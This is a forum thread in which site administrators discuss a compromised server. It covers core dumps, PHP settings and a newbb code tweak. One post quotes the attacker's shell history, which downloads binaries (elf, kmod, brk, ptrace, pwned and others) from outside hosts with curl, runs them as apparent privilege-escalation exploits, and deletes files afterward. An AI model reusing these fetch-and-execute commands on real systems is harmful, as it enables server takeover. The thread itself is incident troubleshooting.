DonXoop wrote:
Those are likely core dump files on *nix machines. Usually means that something crashed (Apache?) and left the core file for analysis. Nice how the machine didn't die though eh?

Suggest looking at the Apache and system logs to see what is happening.

jdseymour wrote:
Not to my knowledge, can you give a little more detail as to the type of attack that took place? and what the results where?

uname -a
ls
wget
ls
curl -o elf xuxett.cjb.net/app/elf
ls
chmod +x elf
./elf
./elf -f
ls
curl -o kmod xuxett.cjb.net/app/kmod
chmod +x kmod
./kmod
rm -fr kmod
rm -fr elf
curl -o brk2 xuxett.cjb.net/app/brk2
chmod +x brk2
./brk2
rm -fr brk2
curl -o brk xuxett.cjb.net/app/brk
chmod +x brk
./brk
rm -fr brk
curl -o ptracehttp://207.44.214.72/app/ptrace
chmod +x ptrace
./ptrace
curl -o uselib24 xuxett.cjb.net/app/uselib24
chmod +x uselib24
./uselib24
curl -o pwned xuxett.cjb.net/app/pwned
chmod +x pwned
./pwned
./pwned
./pwned
./elf -f
ls
rm -fr TTdummyfile
rm -fr TTeatfile
rm -fr TTsharefile
ls
rm -fr TTeatfiles
curl -o elf xuxett.cjb.net/app/elf
chmod +x elf
./elf
./elf -f
./elf
ls
curl -o ptrace24 xuxett.cjb.net/app/ptrace24
chmod +x ptrace24
./ptrace24
exec ./ptrace24 22899

ackbarr wrote:
in newbb v2 /modules/newbb/viewforum.php change:

$sortsince = !empty($_GET['sortsince']) ? intval($_GET['sortsince']) : 100;

to:

$sortsince = !empty($_GET['sortsince']) ? intval($_GET['sortsince']) : [color=008000][b]1000[/b][/color];

Burnzy wrote:
omg im cracking up here. They hacked ur site and left there email. Thats halarious. wooo

m0nty wrote:
the internal server error could be due to max memory / max post size set in php.ini

ideally this needs to be a minimum of 16m as the default 8m is a little small for a lot of new scripts.

it could also be due to the time out aswell, but those settings are a server setting so u may need to contact ur host..

of course, it may not be related to that, but it maybe worth checking.. a simple phpinfo() script should give u enuff info to check those with..